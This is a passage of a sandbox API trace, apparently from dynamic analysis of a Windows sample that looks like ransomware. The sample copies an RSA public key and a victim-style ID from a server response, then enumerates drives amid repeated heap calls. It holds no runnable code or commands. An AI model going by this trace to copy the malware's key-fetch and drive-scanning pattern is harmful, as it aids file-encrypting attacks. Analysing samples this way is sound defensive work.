KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0172.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccf070 | out: hHeap=0x6a0000) returned 1 [0172.405] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0172.405] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0172.405] lstrcpyA (in: lpString1=0x90cab78, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0172.405] lstrcpyA (in: lpString1=0x90ca778, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0172.405] lstrcpyW (in: lpString1=0x521cf0, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0172.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cceea8 | out: hHeap=0x6a0000) returned 1 [0172.405] lstrcpyW (in: lpString1=0x521cf0, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0172.405] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0172.405] lstrlenW (lpString="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned 40 [0172.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccde38 | out: hHeap=0x6a0000) returned 1 Thread: id = 173 os_tid = 0x264 [0172.993] timeGetTime () returned 0xbb41 [0172.993] GetLastError () returned 0x54f [0172.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x3bc) returned 0x2ccdc28 [0172.994] GetCurrentThreadId () returned 0x264 [0172.994] SetLastError (dwErrCode=0x54f) [0172.994] Sleep (dwMilliseconds=0x0) [0172.997] Sleep (dwMilliseconds=0x3e8) [0174.022] GetLogicalDrives () returned 0x2000004 [0174.022] SetErrorMode (uMode=0x1) returned 0x0 [0174.022] PathFileExistsA (pszPath="C:\\") returned 1 [0174.022] SetErrorMode (uMode=0x0) returned 0x1 [0174.022] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0174.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x806) returned 0x2d2ec90 [0174.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30ffe60, cbMultiByte=-1, lpWideCharStr=0x2d2ec90, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0174.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0174.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44368 [0174.023] SetErrorMode (uMode=0x1) returned 0x0 [0174.023] PathFileExistsA (pszPath="Z:\\") returned 1 [0174.023] SetErrorMode (uMode=0x0) returned 0x1 [0174.023] GetDriveTypeA (lpRootPathName="Z:\\") returned 0x4 [0174.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x806) returned 0x2d2ec90 [0174.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30ffe60, cbMultiByte=-1, lpWideCharStr=0x2d2ec90, cchWideChar=1027 | out: lpWideCharStr="Z:\\") returned 4 [0174.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d15d38 [0174.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b38 [0174.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44368 | out: hHeap=0x6a0000) returned 1 [0174.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.025] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 